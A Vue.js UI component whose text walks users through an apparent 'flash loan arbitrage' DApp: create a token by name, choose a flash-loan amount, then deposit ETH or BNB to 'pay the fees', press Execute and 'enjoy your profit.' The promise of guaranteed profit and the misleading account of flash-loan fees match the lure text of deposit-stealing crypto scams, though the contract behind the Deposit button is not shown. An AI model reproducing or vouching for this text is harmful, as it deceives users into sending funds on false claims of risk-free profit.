<template>
  <div class="hint">
    <p style="font-weight: bold">✅ 1. Create Token By Typing Token Name And Symbol</p>
    <p style="margin-top: 15px">The DAPP will automatically create the token and will be ready for arbitrage on the decentralized exchange (on Ethereum or
      Binance Smart Chain)
    </p>

    <p style="margin-top: 30px;font-weight: bold">✅ 2. Get The Loan For The Arbitrage</p>
    <p style="margin-top: 15px">You can get flash Loan from AAVE, Multiplier-Finance, PancakeSwap or Uniswap (thanks to flash swap). This is
      done for you by the DAPP, just select the loan amount.
    </p>

    <p style="margin-top: 30px;font-weight: bold">✅ 3. Deposit ETH or BNB</p>
    <p style="margin-top: 15px">Now you need pay the fees for the loan to start arbitrage. Click the Deposit button and after that click the
      Execute button. Enjoy your profit. That's all.
    </p>
  </div>
</template>

<script>
export default {
  name: "Hint"
}
</script>

<style scoped>
.hint {
  max-width: 500px;
  width: 100%;

  font-size: 14pt;
  text-align: start;
}
</style>